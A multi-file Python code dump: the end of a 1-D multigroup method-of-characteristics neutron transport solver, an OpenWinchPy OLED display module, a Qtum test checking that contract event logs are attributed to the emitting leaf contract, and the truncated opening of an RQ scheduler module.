                        del_phi=(phi_j[group,angle,jj]-(Q[group,position]/Sigma_trans[group,position]))*(1-math.exp(-s*Sigma_trans[group,position]))
                        phi[position]+=omega_j[jj]*omega_azim*del_phi/(s*Sigma_trans[group,position])
                        phi_j[group,angle,jj]-=del_phi
                    # march forward across cells, then backward after reflection
                    position+=(-1)**reverse
                    if position==NN:
                        # far boundary: record outgoing flux, apply albedo X0,
                        # turn the sweep around (NOTE(review): side/albedo
                        # pairing taken as written — verify naming)
                        reverse=True
                        position-=1
                        phi_j_boun[0,angle]=phi_j[group,angle]
                        phi_j[group,angle]*=X0
                    elif position==-1:
                        # back at the near boundary: record, apply XN, finish
                        phi_j_boun[1,angle]=phi_j[group,angle]
                        phi_j[group,angle]*=XN
                        break
            # publish results and hand control back to the parent
            phi_mpp[:]=phi
            phi_j_mp[a*2*j:b*2*j]=phi_j_boun.reshape(len(angles)*2*j)
            active.value=False
"""
"""
def moc1Dmg():
    """1-D multigroup Method-of-Characteristics eigenvalue solver.

    Spawns ``cores-1`` worker processes running :func:`sweepbyangle` and
    sweeps the last chunk of azimuthal angles in this (parent) process.
    Outer loop: power iteration on the fission source / keff.  Inner
    loop: source iteration per energy group.

    NOTE(review): the whole body sits under ``if __name__ == '__main__'``
    so that re-import by spawned children is a no-op; in a child the
    function implicitly returns None — confirm this is intended.
    """
    import multiprocessing as mp
    import math, numpy as np
    from ctypes import c_bool
    if __name__=='__main__':
        from input import sigma_scatter,sigma_fis,sigma_trans,chi,nu,X,NX,x0,xn,azim_div,energy_group,cores
        # boundary albedos at x=0 and x=X (names taken from the input module)
        X0=x0
        XN=xn
        # mesh: NX[i] equal-width cells in each region of width X[i]
        delx=np.array([])
        N=sum(NX)
        NN=N
        for i in range(len(X)):
            delx=np.append(delx,np.ones(NX[i])*X[i]/NX[i])
        # 3-angle polar quadrature (sin(theta) points and doubled weights)
        sintheta_j=np.array([0.166648,0.537707,0.932954])
        omega_j=np.array([0.046233,0.283619,0.670148])*2
        j=3
        # azimuthal angles over (0, pi/2) with uniform weight
        azim=np.arange(np.pi/azim_div,np.pi/2,2*np.pi/azim_div)
        omega_azim=4*math.pi/azim_div
        phi=np.ones((energy_group,N))
        phi_last=phi.copy()
        keff_last=1
        # evaluate cross sections at each cell midpoint
        Sigma_trans=np.ones((energy_group,N))
        Sigma_scatter=np.ones((N,energy_group,energy_group))
        Sigma_fis=np.ones((energy_group,N))
        Chi=np.ones((energy_group,N))
        Nu=np.ones((energy_group,N))
        for i in range (N):
            x=np.sum(delx[0:i])+(0.5*delx[i])
            Sigma_trans[:,i]=sigma_trans(x)
            Sigma_scatter[i]=sigma_scatter(x)
            Sigma_fis[:,i]=sigma_fis(x)
            Chi[:,i]=chi(x)
            Nu[:,i]=nu(x)
        # initial sources: off-diagonal (group-to-group) scatter + fission
        q=np.ones((energy_group,N))
        F_source=np.ones((energy_group,N))
        S_source=np.ones((energy_group,N))
        for i in range(N):
            S_source[:,i]=np.dot(np.tril(Sigma_scatter[i],k=-1)+np.triu(Sigma_scatter[i],k=1),phi[:,i])
            F_source[:,i]=np.sum(Nu[:,i]*Sigma_fis[:,i]*phi[:,i])*Chi[:,i]
        f_source=F_source.copy()
        q_ext=F_source+S_source
        for i in range(N):
            # total source adds the within-group scatter contribution
            q[:,i]=q_ext[:,i]+(np.diagonal(Sigma_scatter[i])*phi[:,i])
        q_last=q.copy()
        Q=q/(4*math.pi)
        iteration=0
        # shared state visible to worker processes
        group_mp=mp.RawValue('i')
        Q_mp=mp.RawArray('d',np.size(Q))
        Q_mp[:]=Q.reshape(np.size(Q))
        # Q now aliases the shared buffer so updates propagate to workers
        Q=np.asarray(Q_mp).reshape(np.shape(Sigma_trans))
        on=mp.RawValue(c_bool,True)
        active=[]
        angles=[]
        # split the azimuthal angles into one contiguous chunk per core
        angle_per_core=len(azim)/cores
        range_list=[]
        for i in range(cores+1):
            a_b=round(i*angle_per_core)
            range_list.append(a_b)
        for core in range(cores):
            active.append(mp.RawValue(c_bool,False))
        for core in range(cores):
            angles.append(azim[range_list[core]:range_list[core+1]])
        phi_mp=[]
        for core in range (cores):
            phi_mp.append(mp.RawArray('d',N))
        phi_j_mp=mp.RawArray('d',len(azim)*2*j)
        phi_j_mp[:]=np.zeros(len(phi_j_mp))
        phi_j_last=np.asarray(phi_j_mp[:])
        # scratch for the chunk this parent process sweeps itself
        phi_j=np.zeros((energy_group,len(angles[cores-1]),j),dtype='d')
        phi_j_boun=np.zeros((2,len(angles[cores-1]),j),dtype='d')
        # spawn cores-1 workers; the parent handles the last chunk inline
        process_list=[]
        for core in range(cores-1):
            t=mp.Process(target=sweepbyangle,args=(energy_group,X0,XN,omega_j,Q_mp,Sigma_trans,omega_azim,NN,delx,sintheta_j,j,group_mp,angles[core],phi_j_mp,range_list[core],range_list[core+1],phi_mp[core],on,active[core]))
            t.start()
            process_list.append(t)
        while True:
            # ---- outer power iteration ----
            iteration+=1
            print(iteration)
            for group in range(energy_group):
                group_mp.value=group
                while True:
                    # ---- inner source iteration for this group ----
                    Q_mp[:]=q.reshape(np.size(q))/(4*math.pi)
                    phi[group,:]=q[group,:]/Sigma_trans[group,:]
                    # wake the workers for this pass
                    for core in range(cores-1):
                        active[core].value=True
                    # parent sweeps its own chunk (same algorithm as sweepbyangle)
                    for angle in range(len(angles[cores-1])):
                        position=0
                        reverse=False
                        while True:
                            for jj in range(j):
                                s=delx[position]/sintheta_j[jj]/math.cos(angles[cores-1][angle])
                                del_phi=(phi_j[group,angle,jj]-(Q[group,position]/Sigma_trans[group,position]))*(1-math.exp(-s*Sigma_trans[group,position]))
                                phi[group,position]+=omega_j[jj]*omega_azim*del_phi/(s*Sigma_trans[group,position])
                                phi_j[group,angle,jj]-=del_phi
                            position+=(-1)**reverse
                            if position==NN:
                                reverse=True
                                position-=1
                                phi_j_boun[0,angle]=phi_j[group,angle]
                                phi_j[group,angle]*=X0
                            elif position==-1:
                                phi_j_boun[1,angle]=phi_j[group,angle]
                                phi_j[group,angle]*=XN
                                break
                    phi_j_mp[range_list[cores-1]*2*j:range_list[cores]*2*j]=phi_j_boun.reshape(len(angles[cores-1])*2*j)
                    # busy-wait until every worker cleared its active flag
                    while np.sum(np.asarray(active)):
                        pass
                    # accumulate worker contributions, then reset their buffers
                    # (the last slot belongs to the parent and stays zero)
                    for core in range(cores):
                        phi[group,:]+=phi_mp[core][:]
                        phi_mp[core][:]=np.zeros(N)
                    for i in range(N):
                        q[group,i]=q_ext[group,i]+(Sigma_scatter[i,group,group]*phi[group,i])
                    # converge on both boundary angular flux and scalar flux
                    res=np.array([np.max(abs(phi_j_mp[:]-phi_j_last)/phi_j_mp),np.max(abs(phi[group,:]-phi_last[group,:])/phi[group,:])])
                    if np.max(res)<1e-8:
                        break
                    else:
                        phi_j_last=np.asarray(phi_j_mp[:])
                        phi_last[group,:]=phi[group,:].copy()
            # update fission source and eigenvalue estimate
            for i in range(N):
                f_source[:,i]=np.sum(Nu[:,i]*Sigma_fis[:,i]*phi[:,i])*Chi[:,i]
            keff=np.sum(f_source)*keff_last/np.sum(F_source)
            print(keff)
            keff_last=keff
            # rebuild the external source with the new keff-scaled fission term
            q-=q_ext
            F_source=f_source.copy()
            for i in range(N):
                S_source[:,i]=np.dot(np.tril(Sigma_scatter[i],-1)+np.triu(Sigma_scatter[i],1),phi[:,i])
            q_ext=(F_source/keff)+S_source
            q+=q_ext
            convergence=np.max(abs((q-q_last))/q)
            if convergence<1e-6:
                break
            else:
                q_last=q.copy()
        # release the worker processes from their polling loops
        on.value=False
        return phi
# Script entry: run the solver and report wall-clock time.  The call is
# deliberately unguarded — moc1Dmg() itself checks __name__ so that
# re-import in spawned worker processes is a no-op.
import time
initial_time=time.time()
phi=moc1Dmg()
print(time.time()-initial_time)
|
display.py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# OpenWinchPy : a library for controlling the Raspberry Pi's Winch
# Copyright (c) 2020 Mickael Gaillard <mick.gaillard@gmail.com>
from luma.core.render import canvas
from luma.core.sprite_system import framerate_regulator
from PIL import ImageFont
from abc import ABC, abstractmethod
from enum import Enum, unique
import sys
import threading
from openwinch.config import config
from openwinch.constantes import SPEED_UNIT, WINCH_DISTANCE
from openwinch.input import InputType
from openwinch.logger import logger
from openwinch.display_config import (ITEM_BACK,
COLOR_PRIM_FONT,
COLOR_PRIM_BACK,
COLOR_SELC_FONT,
COLOR_SELC_BACK,
FONT_TEXT,
FONT_ICON,
FONT_LOGO)
from openwinch.hardware_config import (LCD_HEIGHT, LCD_WIDTH, LCD_ADDR, LCD_FPS)
from openwinch.version import __version__
@unique
class GuiType(Enum):
    """Supported display backends for the winch GUI."""

    DISABLE = 0      # no display attached
    SH1106_I2C = 1   # physical OLED over I2C
    VGA = 100        # pygame-based emulator window
    CAPTURE = 101    # frame capture to PNG files (documentation mode)
class Gui(object):
    """Drives the winch display: owns the luma device, the active screen
    and the background draw loop.

    Fixes: ``__draw_loop`` previously evaluated ``self.extractScreen``
    without calling it, so CAPTURE/DISABLE modes silently did nothing;
    ``threading.currentThread()`` (deprecated alias) is replaced by
    ``threading.current_thread()``.
    """

    cursor_pos = 1
    view_pos = 0
    __winch = None
    __device = None
    screen = None
    # distance = 1

    def __init__(self, winch):
        # Instantiate the backend selected by configuration; imports are
        # kept local so unused backends never load their drivers.
        if (config.GUI == GuiType.SH1106_I2C.name):
            from luma.core.interface.serial import i2c
            from luma.oled.device import sh1106
            serial_interface = i2c(port=1, address=LCD_ADDR)
            self.__device = sh1106(serial_interface, width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0)
        elif (config.GUI == GuiType.VGA.name):
            from luma.emulator.device import pygame
            self.__device = pygame(width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0, mode='1', transform='scale2x', scale=2, frame_rate=60)
        elif (config.GUI == GuiType.CAPTURE.name):
            from luma.emulator.device import capture
            self.__device = capture(width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0, mode='1', transform='scale2x', scale=2, file_template="docs/images/screens/OpenWinch_{0:06}.png")
        if (self.__device is not None):
            self.__device.show()
        self.__winch = winch
        self.__font = ImageFont.truetype(FONT_TEXT, 8)
        self.__regulator = framerate_regulator(fps=LCD_FPS)
        self.screen = MainScreen(self)

    def getWinch(self):
        """Return the winch controller this GUI displays."""
        return self.__winch

    def __drawBoot(self):
        # Splash screen: centered logo with the version below it.
        if (self.__device is not None):
            with canvas(self.__device) as draw:
                font_size = 20
                name = "OpenWinch"
                x = (LCD_WIDTH / 2) - (len(name) / 2 * font_size / 2)
                xver = (LCD_WIDTH / 2) + (((len(name) / 2) - 1) * font_size / 2)
                y = (LCD_HEIGHT / 2) - (font_size / 2)
                yver = y + font_size
                draw.text((x, y), name, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_LOGO, font_size))
                draw.text((xver, yver), __version__, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 8))

    def boot(self):
        """Show the splash screen, then start the background draw thread."""
        self.__drawBoot()
        self.__display_draw_Loop = threading.Thread(target=self.__draw_loop, name="display", args=(), daemon=True)
        self.__display_draw_Loop.start()

    def display(self):
        """Render the active screen once."""
        if (self.__device is not None):
            with canvas(self.__device) as draw:
                self.screen.display(draw)

    def getPos(self):
        """Current cursor position within the active screen."""
        return self.cursor_pos

    def enter(self, key):
        """Apply a key press: move the cursor or forward ENTER to the screen."""
        # Directional Common
        if (InputType.RIGHT == key):
            self.cursor_pos += 1
        elif (InputType.LEFT == key):
            self.cursor_pos -= 1
        elif (InputType.ENTER == key):
            self.screen.enter(self.cursor_pos)
        # out bound fix: wrap the cursor around the current screen's items
        if (self.cursor_pos < 0):
            if (self.screen.countItems() - 1 > 0):
                self.cursor_pos = self.screen.countItems() - 1
            else:
                self.cursor_pos = 0
        elif (self.cursor_pos > self.screen.countItems() - 1):
            self.cursor_pos = 0

    def statusBar(self, draw):
        """Draw battery and wifi indicators along the top edge."""
        # Battery: pick the icon for the current charge band
        battery_value = self.__winch.getBattery()
        battery_symbol = "๏"
        if (battery_value > 87.5):
            battery_symbol = "๏"
        elif (battery_value > 62.5):
            battery_symbol = "๏"
        elif (battery_value > 37.5):
            battery_symbol = "๏"
        elif (battery_value > 12.5):
            battery_symbol = "๏"
        battery_x = 2
        draw.text((battery_x, 0), battery_symbol, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_ICON, 8))
        draw.text((battery_x + 15, 1), "%s%%" % battery_value, fill=COLOR_PRIM_FONT, font=self.__font)
        # Wifi
        wifi_x = 105
        draw.text((wifi_x, 0), "๏", fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_ICON, 8))
        draw.text((wifi_x + 7, 1), "%s " % self.__winch.getRemote(), fill=COLOR_PRIM_FONT, font=self.__font)

    def createValue(self, draw, title, value):
        """Render a titled numeric value editor with a save hint footer."""
        draw.text((0, 0), title, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 12))
        draw.rectangle([0, 12, LCD_WIDTH, 12], fill="white", outline="white")
        draw.text((2, 18), "%s" % value, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 14))
        y = 0.78 * LCD_HEIGHT
        draw.rectangle([0, y, LCD_WIDTH, LCD_HEIGHT], fill="white", outline="white")
        draw.text((0, 0.80 * LCD_HEIGHT), "exit to save...", fill="black", font=ImageFont.truetype(FONT_TEXT, 12))

    def createMenuScroll(self, draw, items, selected_item=None):
        """Render a vertically scrolling menu; highlights the cursor row
        and marks *selected_item* with a check icon."""
        font_size = 12
        draw_cursor_pos = 0
        draw_view_pos = 0
        # scroll the view once the cursor passes the last visible row
        cursor_limit_screen = (LCD_HEIGHT / font_size) - 1
        if (self.cursor_pos > cursor_limit_screen):
            draw_view_pos = -((self.cursor_pos - cursor_limit_screen) * font_size)
        for item in items:
            text_color = COLOR_PRIM_FONT
            y = draw_cursor_pos * font_size
            if (self.cursor_pos == draw_cursor_pos):
                # inverted colors for the row under the cursor
                text_color = "black"
                draw.rectangle([0, draw_view_pos + y, LCD_WIDTH, draw_view_pos + y + font_size], fill="white", outline="white")
            if (selected_item is not None and selected_item == item):
                draw.text((LCD_WIDTH - font_size, draw_view_pos + y), "๏", fill=text_color, font=ImageFont.truetype(FONT_ICON, font_size - 2))
            draw.text((1, draw_view_pos + y), item, fill=text_color, font=ImageFont.truetype(FONT_TEXT, font_size))
            draw_cursor_pos += 1

    def createMenuIcon(self, draw, items):
        """Render a three-button icon bar across the bottom of the screen."""
        font_size = 12
        btn_width = LCD_WIDTH / 3
        btn_start = ((btn_width - font_size) / 2) + 1
        btn_height = 0.78 * LCD_HEIGHT
        draw_cursor_pos = 0
        for item in items:
            bgd = "white"
            fnt = "black"
            if (draw_cursor_pos == self.cursor_pos):
                # inverted colors for the selected button
                bgd = "black"
                fnt = "white"
            draw.rectangle([draw_cursor_pos * btn_width, btn_height, (draw_cursor_pos + 1) * btn_width, LCD_HEIGHT], fill=bgd, outline=fnt)
            draw.text((btn_start + draw_cursor_pos * btn_width, 0.79 * LCD_HEIGHT), items[draw_cursor_pos], fill=fnt, font=ImageFont.truetype(FONT_ICON, font_size))
            draw_cursor_pos += 1

    def __draw_loop(self):
        """Background loop: redraw at LCD_FPS until told to stop.

        In CAPTURE (and DISABLE) mode, run the scripted screen
        extraction once instead of looping.
        """
        # currentThread() is a deprecated alias of current_thread()
        t = threading.current_thread()
        if (config.GUI != GuiType.DISABLE.name and config.GUI != GuiType.CAPTURE.name):
            while getattr(t, "do_run", True):
                with self.__regulator:
                    if (self.__winch.getState().isBoot):
                        self.display()
                    else:
                        self.__drawBoot()
        else:
            # BUG FIX: was `self.extractScreen` (attribute access, never
            # called), so capture mode produced no screenshots.
            self.extractScreen()

    def extractScreen(self):
        # Capture mode for DOC: replay a fixed input script, rendering
        # each screen so the capture device writes one PNG per frame.
        self.display()
        # Stop Screen 003
        self.enter(InputType.ENTER)
        self.display()
        # Play Screen
        self.enter(InputType.ENTER)
        # Menu Screen 004 & 005
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        # Manual position 006 & 007
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        self.enter(InputType.ENTER)
        # Security distance 008 & 009
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        self.enter(InputType.ENTER)
        # Mode Selector 010 & 011
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        # Mode Velocity Start 012 & 013
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        self.enter(InputType.ENTER)
        # Mode Velocity Stop 014 & 015
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.enter(InputType.RIGHT)
        self.display()
        self.enter(InputType.ENTER)
        self.display()
        self.enter(InputType.ENTER)
class ScreenBase(ABC):
    """Abstract base for GUI screens; resets cursor state on activation."""

    _gui = None
    _winch = None

    def __init__(self, gui):
        # entering a screen always starts with the cursor at the top
        gui.cursor_pos = 0
        gui.view_pos = 0
        self._gui = gui
        self._winch = gui.getWinch()

    @abstractmethod
    def countItems(self) -> int:
        """Number of selectable items on this screen."""

    @abstractmethod
    def display(self, draw):
        """Render this screen onto *draw*."""

    @abstractmethod
    def enter(self, cursor_pos):
        """Handle an ENTER press at *cursor_pos*."""
class MainScreen(ScreenBase):
    """Home screen: status bar, target speed, distance gauge and a
    three-button icon bar whose icons depend on the winch state."""

    # icon triplets for the bottom bar, per winch state (icon font glyphs)
    __ITEMS_IDLE = ["๏", "๏ญ", ""]
    __ITEMS_RUNNING = ["๏", "๏ญ", ""]
    __ITEMS_ERROR = ["๏ฑ", "๏ญ", "๏"]
    # frame counter driving the distance-bar animation
    __count = 1

    def countItems(self) -> int:
        return len(self.__ITEMS_IDLE)

    def display(self, draw):
        self.__count += 2
        # NOTE(review): __inver is written here but never read in this
        # class — confirm it is unused before removing
        self.__inver = True
        # Status bar
        self._gui.statusBar(draw)
        # Speed: large target-speed figure with its unit beside it
        speed_x = 54
        draw.text((speed_x, 14), "%s" % self._winch.getSpeedTarget(), fill="white", font=ImageFont.truetype(FONT_TEXT, 35))
        draw.text((speed_x + 40, 28), SPEED_UNIT, fill="white", font=ImageFont.truetype(FONT_TEXT, 15))
        # Distance: bar width proportional to distance travelled
        marg = 4
        percent = 1 / WINCH_DISTANCE * self._winch.getDistance()
        draw.rectangle([0 + marg, 11, ((LCD_WIDTH - marg) * percent), 14], fill="white", outline="white")
        # bottom icon bar reflects the winch state
        if (self._winch.getState().isStop):
            self._gui.createMenuIcon(draw, self.__ITEMS_IDLE)
        elif (self._winch.getState().isRun):
            self._gui.createMenuIcon(draw, self.__ITEMS_RUNNING)
            self.__animateDistance(draw)
        else:
            self._gui.createMenuIcon(draw, self.__ITEMS_ERROR)

    def __animateDistance(self, draw):
        # sweep small black notches across the distance bar while running
        cursor_size = 2
        stepper = 10
        if (self.__count >= stepper):
            self.__count = 1
        if(self.__count % stepper != 0):
            for i in range(0, int(LCD_WIDTH / stepper), 1):
                draw.rectangle([self.__count + (i * stepper), 11, (self.__count + (i * stepper)) + cursor_size, 14], fill="black", outline="black")

    def enter(self, cursor_pos):
        # button 0 toggles start/stop, 1 opens the menu, 2 is unused
        if (0 == cursor_pos):
            if (self._winch.getState().isStop):
                self._winch.start()
            else:
                self._winch.stop()
        if (1 == cursor_pos):
            self._gui.screen = MenuScreen(self._gui)
        if (2 == cursor_pos):
            pass
class MenuScreen(ScreenBase):
    """Top-level settings menu; routes each entry to its sub-screen."""

    __ITEMS_MENU = [
        ITEM_BACK,
        "Manual position",
        "Security distance",
        "Mode selector",
        "Velocity Start",
        "Velocity Stop",
    ]

    def countItems(self) -> int:
        return len(self.__ITEMS_MENU)

    def display(self, draw):
        self._gui.createMenuScroll(draw, self.__ITEMS_MENU)

    def enter(self, cursor_pos):
        # map each menu index to the screen class it opens
        targets = {
            0: MainScreen,
            1: ManualPositionScreen,
            2: SecurityDistanceScreen,
            3: ModeSelectorScreen,
            4: VelocityStartScreen,
            5: VelocityStopScreen,
        }
        screen_cls = targets.get(cursor_pos)
        if screen_cls is not None:
            self._gui.screen = screen_cls(self._gui)
class ManualPositionScreen(ScreenBase):
    """Free jog screen: LEFT/RIGHT move the winch, ENTER goes back."""

    def __init__(self, gui):
        super(ManualPositionScreen, self).__init__(gui)
        # Load from item
        # park the cursor mid-range so both directions stay available
        self._gui.cursor_pos = sys.maxsize / 2

    def countItems(self) -> int:
        # effectively unbounded: cursor position is the jog position
        return sys.maxsize

    def enter(self, cursor_pos):
        self._gui.screen = MenuScreen(self._gui)

    def display(self, draw):
        draw.text((1, 1), "Move with Right/Left button.", fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 12))
        footer_top = 0.78 * LCD_HEIGHT
        draw.rectangle([0, footer_top, LCD_WIDTH, LCD_HEIGHT], fill="white", outline="white")
        draw.text((0, 0.80 * LCD_HEIGHT), "enter to exit.", fill="black", font=ImageFont.truetype(FONT_TEXT, 12))
class SecurityDistanceScreen(ScreenBase):
    """Numeric editor for the security-distance setting."""

    TITLE = "Security distance"
    value = 10

    def __init__(self, gui):
        super(SecurityDistanceScreen, self).__init__(gui)
        # Load from item
        # seed the cursor with the current value; editing moves the cursor
        self._gui.cursor_pos = self.value

    def countItems(self) -> int:
        # the value is edited through the cursor position, capped at 255
        return 255

    def enter(self, cursor_pos):
        # Save to item
        self._gui.screen = MenuScreen(self._gui)

    def display(self, draw):
        self._gui.createValue(draw, self.TITLE, self._gui.getPos())
class ModeSelectorScreen(ScreenBase):
    """Pick the winch traversal mode (selection currently fixed to OneWay)."""

    __TITLE = "Mode selector"
    __ITEMS = [
        ITEM_BACK,
        "OneWay",
        "TwoWay",
    ]

    def __init__(self, gui):
        super(ModeSelectorScreen, self).__init__(gui)
        # Load from item
        # self._gui.cursor_pos = 0

    def countItems(self) -> int:
        return len(self.__ITEMS)

    def enter(self, cursor_pos):
        # Save to item
        self._gui.screen = MenuScreen(self._gui)

    def display(self, draw):
        self._gui.createMenuScroll(draw, self.__ITEMS, "OneWay")
class VelocityStartScreen(ScreenBase):
    """Numeric editor for the start-velocity setting."""

    TITLE = "Velocity Start"
    value = 10

    def __init__(self, gui):
        super(VelocityStartScreen, self).__init__(gui)
        # Load from item
        # seed the cursor with the current value; editing moves the cursor
        self._gui.cursor_pos = self.value

    def countItems(self) -> int:
        # the value is edited through the cursor position, capped at 255
        return 255

    def enter(self, cursor_pos):
        # Save to item
        self._gui.screen = MenuScreen(self._gui)

    def display(self, draw):
        self._gui.createValue(draw, self.TITLE, self._gui.getPos())
class VelocityStopScreen(ScreenBase):
    """Numeric editor for the stop-velocity setting."""

    TITLE = "Velocity Stop"
    value = 10

    def __init__(self, gui):
        super(VelocityStopScreen, self).__init__(gui)
        # Load from item
        # seed the cursor with the current value; editing moves the cursor
        self._gui.cursor_pos = self.value

    def countItems(self) -> int:
        # the value is edited through the cursor position, capped at 255
        return 255

    def enter(self, cursor_pos):
        # Save to item
        self._gui.screen = MenuScreen(self._gui)

    def display(self, draw):
        self._gui.createValue(draw, self.TITLE, self._gui.getPos())
|
qtum_transaction_receipt_origin_contract_address.py | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
import threading
def waitforlogs(node, contract_address):
    """Block on waitforlogs for *contract_address*, stash the result on *node*.

    Intended to run in a helper thread while the main thread mines blocks.
    """
    # filter restricts matching to the single contract address
    filter_json = '{"addresses": ["' + contract_address + '"]}'
    from_block = node.cli.getblockcount() - 1
    node.result = node.cli.waitforlogs(from_block, 1000, filter_json)
class QtumTransactionReceiptOriginContractAddressTest(BitcoinTestFramework):
    """Checks that event logs (and waitforlogs filtering) are attributed to
    the contract that actually emitted the event — the leaf of a call
    chain — not to the intermediate contracts that forwarded the call."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        # log events and the tx index are required for receipts/waitforlogs
        self.extra_args = [['-logevents', '-txindex']]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def run_test(self):
        self.node = self.nodes[0]
        # mature enough coinbase outputs to fund contract creation
        self.nodes[0].generate(10 + COINBASE_MATURITY)
        """
        pragma solidity ^0.5.2;

        contract Test {
            event TestEvent();
            address private child;

            function setChildContract(address childContractAddress) external {
                child = childContractAddress;
            }

            function doEvent() external {
                if(child == address(0x0)) {
                    emit TestEvent();
                } else {
                    Test(child).doEvent();
                }
            }

            function getChildAddress() public view returns(address) {
                return child;
            }
        }
        """
        """
        Function signatures:
        afd67ce7: doEvent()
        bcb1c3a9: getChildAddress()
        f8d86e18: setChildContract(address)
        """
        # Set up a chain of 10 contracts that reference their child contract. I.e. the tenth contract is the leaf
        contracts = []
        contract_bytecode = "608060405234801561001057600080fd5b506102b8806100206000396000f3fe608060405234801561001057600080fd5b506004361061005e576000357c010000000000000000000000000000000000000000000000000000000090048063afd67ce714610063578063bcb1c3a91461006d578063f8d86e18146100b7575b600080fd5b61006b6100fb565b005b610075610220565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b6100f9600480360360208110156100cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610249565b005b600073ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610182577f24ec1d3ff24c2f6ff210738839dbc339cd45a5294d85c79361016243157aae7b60405160405180910390a161021e565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663afd67ce76040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15801561020757600080fd5b5060325a03f115801561021957600080fd5b505050505b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505056fea165627a7a723058203cf61a18e40f6e2bd01b2f7bd607c6e6aff032f12bd5e3eca68212d2e2c80dbf0029"
        for i in range(10):
            contracts.append(self.nodes[0].createcontract(contract_bytecode)['address'])
            self.node.generate(1)
            if len(contracts) > 1:
                # link the previous contract to the one just created
                # (setChildContract with the zero-padded address argument)
                self.node.sendtocontract(contracts[-2], "f8d86e18" + (contracts[-1].zfill(64)), 0, 1000000)
                self.node.generate(1)

        # Run the doEvent function recursively starting at the root contract and make sure that no event entries are in the returndata for waitforlogs for the first 9 contracts
        for contract_address in contracts[:-1]:
            thread = threading.Thread(target=waitforlogs, args=(self.node, contract_address))
            thread.start()
            txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
            self.node.generate(7)
            thread.join()
            receipt = self.node.gettransactionreceipt(txid)
            # the log must be attributed to the leaf contract only
            assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
            assert_equal(len(self.node.result['entries']), 0)

        # Do the same thing again but make sure that the event triggers for the "leaf" (10th) contract
        thread = threading.Thread(target=waitforlogs, args=(self.node, contracts[-1]))
        thread.start()
        txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
        self.node.generate(7)
        thread.join()
        receipt = self.node.gettransactionreceipt(txid)
        assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
        assert_equal(len(self.node.result['entries']), 1)

if __name__ == '__main__':
    QtumTransactionReceiptOriginContractAddressTest().main()
|
scheduler.py | import logging
import os
import signal
import time
import traceback
from datetime import datetime
from multiprocessing import Process
from redis import Redis, SSLConnection, UnixDomainSocketConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .utils import current_timestamp, enum
# Redis key templates: a scheduler's own key and its per-queue lock key.
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class RQScheduler(object):
    """Moves due jobs from each queue's ScheduledJobRegistry onto the
    queue itself, coordinating with other schedulers via Redis locks."""

    # STARTED: scheduler has been started but sleeping
    # WORKING: scheduler is in the midst of scheduling jobs
    # STOPPED: scheduler is in stopped condition
    Status = enum(
        'SchedulerStatus',
        STARTED='started',
        WORKING='working',
        STOPPED='stopped'
    )
def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT):
self._queue_names = set(parse_names(queues))
self._acquired_locks = set()
self._scheduled_job_registries = []
self.lock_acquisition_time = None
# Copy the connection kwargs before mutating them in order to not change the arguments
# used by the current connection pool to create new connections
self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
# Redis does not accept parser_class argument which is sometimes present
# on connection_pool kwargs, for example when hiredis is used
self._connection_kwargs.pop('parser_class', None)
self._connection_class = connection.__class__ # client
connection_class = connection.connection_pool.connection_class
if issubclass(connection_class, SSLConnection):
self._connection_kwargs['ssl'] = True
if issubclass(connection_class, UnixDomainSocketConnection):
